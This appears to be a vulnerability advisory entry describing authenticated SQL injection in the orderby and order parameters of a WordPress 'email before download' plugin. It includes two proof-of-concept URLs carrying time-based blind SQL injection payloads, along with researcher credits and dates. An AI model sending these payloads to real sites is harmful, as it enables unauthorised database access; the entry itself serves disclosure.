The plugin does not properly validate and escape the order and orderby GET parameters before using them in SQL statements, leading to authenticated SQL injection issues
https://example.com/wp-admin/admin.php?page=email-before-download-links&order=desc&orderby=time_requested+AND+%28SELECT+1554+FROM+%28SELECT%28SLEEP%285%29%29%29gPZH%29 https://example.com/wp-admin/admin.php?page=email-before-download-links&orderby=time_requested&order=+AND+%28SELECT+42+FROM+%28SELECT%28SLEEP%285%29%29%29b%29
bl4derunner
Anton Sarsadskikh
Yes
2021-11-01 (about 6 months ago)
2021-11-01 (about 6 months ago)
2022-04-09 (about 1 months ago)